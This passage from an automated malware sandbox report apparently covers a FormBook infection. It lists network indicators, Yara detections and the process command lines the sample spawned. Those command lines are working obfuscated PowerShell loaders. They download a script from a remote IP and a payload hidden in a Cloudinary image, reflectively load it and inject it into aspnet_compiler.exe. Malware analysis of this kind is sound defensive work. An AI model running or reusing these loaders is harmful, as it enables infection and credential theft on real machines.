cfL4;desc="?proto=TCP&rtt=1908&min_rtt=1908&rtt_var=954&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=771&delivery_rate=0&cwnd=210&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 35 31 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ac 57 5f 6f dc 36 0c 7f ce 01 f9 0e ac 0a e4 5a 6c 3e 27 6d b7 15 ad ed a1 4b 1b ac 0f eb 82 a6 c5 b0 a7 41 67 d3 b6 16 59 52 24 f9 2e 07 ec c3 0f 92 fc f7 7a 4b ee 61 79 38 4b 24 c5 1f 49 91 14 93 3c 79 ff fb e5 97 3f af 3f 40 6d 1b 9e 2d 12 f7 81 82 e9 94 70 ab 09 70 2a aa 94 a0 88 be de 10 c7 45 5a 64 8b a4 41 4b 21 af a9 36 68 53 f2 f5 cb 55 f4 9a 40 9c 2d 12 cb 2c c7 ec 9a 56 08 42 5a 28 65 2b 0a f8 07 72 56 52 23 f2 15 13 a5 4c e2 20 b4 48 Data Ascii: 51eW_o6Zl>'mKAgYR$.zKay8K$I<y??@m-pp*EZdAK!6hSU@-,VBZ(e+rVR#L H
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 04 Dec 2024 12:10:00 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closex-pingback: http://cifasnc.info/xmlrpc.phpexpires: Wed, 11 Jan 1984 05:00:00 GMTlast-modified: Wed, 04 Dec 2024 12:10:00 GMTcache-control: no-cache, must-revalidate, max-age=0pragma: no-cachevary: Accept-Encoding,User-Agentx-turbo-charged-by: LiteSpeedCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=I2EAyYF26HOQOXyLZrJaXL%2BO0itnYrPq0Pm8olJjXXIBWaGdnjFau%2BtdSo48j%2B4BXqKYiU%2B9Ukd2ueXNJd0lq2J3dggC4o1b53gE%2B8NPIwrrsgqdp3kcr8djVmMOJ6iqstFV"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ecbb0d58bf6efa3-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1959&min_rtt=1959&rtt_var=979&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1788&delivery_rate=0&cwnd=111&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 35 31 32 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ac 57 5f 6f dc 36 0c 7f ce 01 f9 0e ac 0a e4 5a 6c 3e 27 6d b7 15 ad ed a1 4b 1b ac 0f eb 82 a6 c5 b0 a7 41 67 d3 b6 16 59 52 24 f9 2e 07 ec c3 0f 92 fc f7 7a 4b ee 61 79 38 4b 24 c5 1f 49 91 14 93 3c 79 ff fb e5 97 3f af 3f 40 6d 1b 9e 2d 12 f7 81 82 e9 94 70 ab 09 70 2a aa 94 a0 88 be de 10 c7 45 5a 64 8b a4 41 4b 21 af a9 36 68 53 f2 f5 cb 55 f4 9a 40 9c 2d 12 cb 2c c7 ec 9a 56 08 42 5a 28 65 2b 0a f8 07 72 56 52 23 f2 15 13 a5 Data Ascii: 512W_o6Zl>'mKAgYR$.zKay8K$I<y??@m-pp*EZdAK!6hSU@-,VBZ(e+rVR#
                      Source: powershell.exe, 00000003.00000002.1544480434.0000000005148000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://107.172.44.175/244/nightr
                      Source: powershell.exe, 00000003.00000002.1544480434.0000000005148000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1547598476.00000000077F7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1547598476.00000000077BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://107.172.44.175/244/nightridingisreallyniceforworkingskillentiretimefornew.tiFF
                      Source: powershell.exe, 00000003.00000002.1547598476.00000000077BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://107.172.44.175/244/nightridingisreallyniceforworkingskillentiretimefornew.tiFF;
                      Source: powershell.exe, 00000003.00000002.1547598476.00000000077BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://107.172.44.175/244/nightridingisreallyniceforworkingskillentiretimefornew.tiFFD
                      Source: msinfo32.exe, 00000010.00000002.2659047347.00000000059B6000.00000004.10000000.00040000.00000000.sdmp, HDLzkMKGEKBh.exe, 00000011.00000002.2658455392.0000000002DA6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://cifasnc.info/wl1d/?CJE8V=XvUXHicd9bu/Gt5jzcf/yfRZ
                      Source: msinfo32.exe, 00000010.00000002.2659047347.00000000059B6000.00000004.10000000.00040000.00000000.sdmp, HDLzkMKGEKBh.exe, 00000011.00000002.2658455392.0000000002DA6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://cifasnc.info/xmlrpc.php
                      Source: powershell.exe, 00000003.00000002.1545943056.000000000605B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1751692593.0000000005EDC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                      Source: powershell.exe, 00000008.00000002.1751692593.0000000004FC7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                      Source: powershell.exe, 00000003.00000002.1544480434.0000000005148000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                      Source: powershell.exe, 00000003.00000002.1544480434.0000000004FF1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1751692593.0000000004E71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: powershell.exe, 00000003.00000002.1544480434.0000000005148000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                      Source: powershell.exe, 00000008.00000002.1751692593.0000000004FC7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                      Source: HDLzkMKGEKBh.exe, 00000011.00000002.2660016634.0000000004CD0000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.sql.dance
                      Source: HDLzkMKGEKBh.exe, 00000011.00000002.2660016634.0000000004CD0000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.sql.dance/9p84/
                      Source: msinfo32.exe, 00000010.00000002.2661016867.000000000817A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                      Source: powershell.exe, 00000003.00000002.1544480434.0000000004FF1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1751692593.0000000004E71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
                      Source: powershell.exe, 00000003.00000002.1544480434.0000000005148000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelp
                      Source: msinfo32.exe, 00000010.00000002.2661016867.000000000817A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                      Source: msinfo32.exe, 00000010.00000002.2661016867.000000000817A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                      Source: msinfo32.exe, 00000010.00000002.2661016867.000000000817A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                      Source: powershell.exe, 00000008.00000002.1751692593.0000000005EDC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                      Source: powershell.exe, 00000008.00000002.1751692593.0000000005EDC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                      Source: powershell.exe, 00000008.00000002.1751692593.0000000005EDC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                      Source: msinfo32.exe, 00000010.00000002.2661016867.000000000817A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                      Source: msinfo32.exe, 00000010.00000002.2661016867.000000000817A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                      Source: msinfo32.exe, 00000010.00000002.2661016867.000000000817A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                      Source: powershell.exe, 00000008.00000002.1751692593.0000000004FC7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                      Source: powershell.exe, 00000003.00000002.1547598476.0000000007769000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com(x86)/AutoIt3/AutoItX/.0/Modules/UEV/icrosoft.Uev.Commands.dll
                      Source: msinfo32.exe, 00000010.00000002.2656376865.000000000302D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                      Source: msinfo32.exe, 00000010.00000002.2656376865.000000000304C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                      Source: msinfo32.exe, 00000010.00000003.2301579940.0000000008158000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
                      Source: msinfo32.exe, 00000010.00000002.2656376865.000000000302D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                      Source: msinfo32.exe, 00000010.00000002.2656376865.000000000302D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
                      Source: msinfo32.exe, 00000010.00000002.2656376865.000000000302D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                      Source: msinfo32.exe, 00000010.00000002.2656376865.000000000304C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                      Source: powershell.exe, 00000003.00000002.1545943056.000000000605B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1751692593.0000000005EDC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                      Source: powershell.exe, 00000008.00000002.1751692593.0000000004FC7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://res.cloudinary.com
                      Source: powershell.exe, 00000008.00000002.1751692593.0000000004FC7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://res.cloudinary.com/dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpg
                      Source: powershell.exe, 00000008.00000002.1751692593.0000000004FC7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://res.cloudinary.com/dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpgt
                      Source: msinfo32.exe, 00000010.00000002.2661016867.000000000817A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
                      Source: unknownHTTPS traffic detected: 151.101.129.137:443 -> 192.168.2.8:49705 version: TLS 1.2

                      E-Banking Fraud

                      barindex
                      Yara detected FormBook
                      Source: Yara matchFile source: 12.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000010.00000002.2658176307.0000000004BD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.2122879253.00000000015E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.2105673675.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000010.00000002.2658252130.0000000004C20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000010.00000002.2655932579.0000000002EA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.2138725831.00000000025A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000002.2658015654.00000000035E0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

                      System Summary

                      barindex
                      Detected Cobalt Strike Beacon
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe pOwersHeLL -ex bYpASS -NoP -w 1 -c DeVIceCrEDeNTIALDEPLOyMent ; iNvoKe-EXpRESSioN($(inVoKe-ExPRESsIOn('[sySTEm.teXT.eNcoDIng]'+[chaR]0x3A+[ChAR]58+'uTF8.GEtSTriNg([SysTeM.CoNVERt]'+[cHar]58+[CHAr]58+'fROMBaSE64STRiNG('+[ChAr]0x22+'JDM4TDVlalpXSUdyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZEQtVHlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFcmRlRklOSXRJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVUkxNb24iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZ3JKcHosc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBOQSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG1NeSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBWY09oeUxjTkloVSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHNJTnQpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiUGV6TWJGd0JaZiIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1FU1BBQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHpGY3FXayAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJDM4TDVlalpXSUdyOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA3LjE3Mi40NC4xNzUvMjQ0L25pZ2h0cmlkaW5naXNyZWFsbHluaWNlZm9yd29ya2luZ3NraWxsZW50aXJldGltZWZvcm5ldy50aUZGIiwiJGVuVjpBUFBEQVRBXG5pZ2h0cmlkaW5naXNyZWFsbHluaWNlZm9yd29ya2luZ3NraWxsZW50aXJldGltZWZvcm4udmJTIiwwLDApO3NUQXJ0LXNMZWVwKDMpO0lJICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVudjpBUFBEQVRBXG5pZ2h0cmlkaW5naXNyZWFsbHluaWNlZm9yd29ya2luZ3NraWxsZW50aXJldGltZWZvcm4udmJTIg=='+[cHAr]34+'))')))"
                      Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $familial = 'JHNlcmVuYWRlID0gJ2h0dHBzOi8vcmVzLmNsb3VkaW5hcnkuY29tL2R5dGZsdDYxbi9pbWFnZS91cGxvYWQvdjE3MzMxMzQ5NDcvYmtscHlzZXlldXQ0aW1wdzUwbjEuanBnICc7JGZ1Z3VzID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDskYm94aWVyID0gJGZ1Z3VzLkRvd25sb2FkRGF0YSgkc2VyZW5hZGUpOyRwYXJ0aWN1bGFyaXplID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoJGJveGllcik7JHBsYWlubmVzcyA9ICc8PEJBU0U2NF9TVEFSVD4+JzskcmF0dGxlYm94ZXMgPSAnPDxCQVNFNjRfRU5EPj4nOyRzdXBlcnByb2ZpdCA9ICRwYXJ0aWN1bGFyaXplLkluZGV4T2YoJHBsYWlubmVzcyk7JGNhbnRpbGxhdGluZyA9ICRwYXJ0aWN1bGFyaXplLkluZGV4T2YoJHJhdHRsZWJveGVzKTskc3VwZXJwcm9maXQgLWdlIDAgLWFuZCAkY2FudGlsbGF0aW5nIC1ndCAkc3VwZXJwcm9maXQ7JHN1cGVycHJvZml0ICs9ICRwbGFpbm5lc3MuTGVuZ3RoOyR1bmZyZWVkID0gJGNhbnRpbGxhdGluZyAtICRzdXBlcnByb2ZpdDskdmluY2FzID0gJHBhcnRpY3VsYXJpemUuU3Vic3RyaW5nKCRzdXBlcnByb2ZpdCwgJHVuZnJlZWQpOyRwcm9ib3NjaWRpYW4gPSAtam9pbiAoJHZpbmNhcy5Ub0NoYXJBcnJheSgpIHwgRm9yRWFjaC1PYmplY3QgeyAkXyB9KVstMS4uLSgkdmluY2FzLkxlbmd0aCldOyRrb21vbmRvciA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJHByb2Jvc2NpZGlhbik7JG51cnNlcnltYW4gPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRrb21vbmRvcik7JGdhcm5pZXJpdGUgPSBbZG5saWIuSU8uSG9tZV0uR2V0TWV0aG9kKCdWQUknKTskZ2Fybmllcml0ZS5JbnZva2UoJG51bGwsIEAoJ3R4dC5GREdGUi80NDIvNTcxLjQ0LjI3MS43MDEvLzpwdHRoJywgJyRzYXlzdCcsICckc2F5c3QnLCAnJHNheXN0JywgJ2FzcG5ldF9jb21waWxlcicsICckc2F5c3QnLCAnJHNheXN0JywnJHNheXN0JywnJHNheXN0JywnJHNheXN0JywnJHNheXN0JywnJHNheXN0JywnMScsJyRzYXlzdCcpKTs=';$monophthongs = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($familial));Invoke-Expression $monophthongs
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe pOwersHeLL -ex bYpASS -NoP -w 1 -c DeVIceCrEDeNTIALDEPLOyMent ; iNvoKe-EXpRESSioN($(inVoKe-ExPRESsIOn('[sySTEm.teXT.eNcoDIng]'+[chaR]0x3A+[ChAR]58+'uTF8.GEtSTriNg([SysTeM.CoNVERt]'+[cHar]58+[CHAr]58+'fROMBaSE64STRiNG('+[ChAr]0x22+'JDM4TDVlalpXSUdyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZEQtVHlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFcmRlRklOSXRJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVUkxNb24iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZ3JKcHosc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBOQSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG1NeSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBWY09oeUxjTkloVSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHNJTnQpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiUGV6TWJGd0JaZiIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1FU1BBQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHpGY3FXayAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJDM4TDVlalpXSUdyOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA3LjE3Mi40NC4xNzUvMjQ0L25pZ2h0cmlkaW5naXNyZWFsbHluaWNlZm9yd29ya2luZ3NraWxsZW50aXJldGltZWZvcm5ldy50aUZGIiwiJGVuVjpBUFBEQVRBXG5pZ2h0cmlkaW5naXNyZWFsbHluaWNlZm9yd29ya2luZ3NraWxsZW50aXJldGltZWZvcm4udmJTIiwwLDApO3NUQXJ0LXNMZWVwKDMpO0lJICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVudjpBUFBEQVRBXG5pZ2h0cmlkaW5naXNyZWFsbHluaWNlZm9yd29ya2luZ3NraWxsZW50aXJldGltZWZvcm4udmJTIg=='+[cHAr]34+'))')))"Jump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $familial = 'JHNlcmVuYWRlID0gJ2h0dHBzOi8vcmVzLmNsb3VkaW5hcnkuY29tL2R5dGZsdDYxbi9pbWFnZS91cGxvYWQvdjE3MzMxMzQ5NDcvYmtscHlzZXlldXQ0aW1wdzUwbjEuanBnICc7JGZ1Z3VzID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDskYm94aWVyID0gJGZ1Z3VzLkRvd25sb2FkRGF0YSgkc2VyZW5hZGUpOyRwYXJ0aWN1bGFyaXplID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoJGJveGllcik7JHBsYWlubmVzcyA9ICc8PEJBU0U2NF9TVEFSVD4+JzskcmF0dGxlYm94ZXMgPSAnPDxCQVNFNjRfRU5EPj4nOyRzdXBlcnByb2ZpdCA9ICRwYXJ0aWN1bGFyaXplLkluZGV4T2YoJHBsYWlubmVzcyk7JGNhbnRpbGxhdGluZyA9ICRwYXJ0aWN1bGFyaXplLkluZGV4T2YoJHJhdHRsZWJveGVzKTskc3VwZXJwcm9maXQgLWdlIDAgLWFuZCAkY2FudGlsbGF0aW5nIC1ndCAkc3VwZXJwcm9maXQ7JHN1cGVycHJvZml0ICs9ICRwbGFpbm5lc3MuTGVuZ3RoOyR1bmZyZWVkID0gJGNhbnRpbGxhdGluZyAtICRzdXBlcnByb2ZpdDskdmluY2FzID0gJHBhcnRpY3VsYXJpemUuU3Vic3RyaW5nKCRzdXBlcnByb2ZpdCwgJHVuZnJlZWQpOyRwcm9ib3NjaWRpYW4gPSAtam9pbiAoJHZpbmNhcy5Ub0NoYXJBcnJheSgpIHwgRm9yRWFjaC1PYmplY3QgeyAkXyB9KVstMS4uLSgkdmluY2FzLkxlbmd0aCldOyRrb21vbmRvciA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJHByb2Jvc2NpZGlhbik7JG51cnNlcnltYW4gPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRrb21vbmRvcik7JGdhcm5pZXJpdGUgPSBbZG5saWIuSU8uSG9tZV0uR2V0TWV0aG9kKCdWQUknKTskZ2Fybmllcml0ZS5JbnZva2UoJG51bGwsIEAoJ3R4dC5GREdGUi80NDIvNTcxLjQ0LjI3MS43MDEvLzpwdHRoJywgJyRzYXlzdCcsICckc2F5c3QnLCAnJHNheXN0JywgJ2FzcG5ldF9jb21waWxlcicsICckc2F5c3QnLCAnJHNheXN0JywnJHNheXN0JywnJHNheXN0JywnJHNheXN0JywnJHNheXN0JywnJHNheXN0JywnMScsJyRzYXlzdCcpKTs=';$monophthongs = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($familial));Invoke-Expression $monophthongsJump to behavior
                      Malicious sample detected (through community Yara rule)
                      Source: Process Memory Space: powershell.exe PID: 6364, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                      Windows Scripting host queries suspicious COM object (likely to drop second stage)
                      Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
                      Wscript starts Powershell (via cmd or directly)
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe pOwersHeLL -ex bYpASS -NoP -w 1 -c DeVIceCrEDeNTIALDEPLOyMent ; iNvoKe-EXpRESSioN($(inVoKe-ExPRESsIOn('[sySTEm.teXT.eNcoDIng]'+[chaR]0x3A+[ChAR]58+'uTF8.GEtSTriNg([SysTeM.CoNVERt]'+[cHar]58+[CHAr]58+'fROMBaSE64STRiNG('+[ChAr]0x22+'JDM4TDVlalpXSUdyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZEQtVHlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFcmRlRklOSXRJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVUkxNb24iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZ3JKcHosc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBOQSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG1NeSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBWY09oeUxjTkloVSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHNJTnQpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiUGV6TWJGd0JaZiIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1FU1BBQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHpGY3FXayAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJDM4TDVlalpXSUdyOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA3LjE3Mi40NC4xNzUvMjQ0L25pZ2h0cmlkaW5naXNyZWFsbHluaWNlZm9yd29ya2luZ3NraWxsZW50aXJldGltZWZvcm5ldy50aUZGIiwiJGVuVjpBUFBEQVRBXG5pZ2h0cmlkaW5naXNyZWFsbHluaWNlZm9yd29ya2luZ3NraWxsZW50aXJldGltZWZvcm4udmJTIiwwLDApO3NUQXJ0LXNMZWVwKDMpO0lJICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVudjpBUFBEQVRBXG5pZ2h0cmlkaW5naXNyZWFsbHluaWNlZm9yd29ya2luZ3NraWxsZW50aXJldGltZWZvcm4udmJTIg=='+[cHAr]34+'))')))"
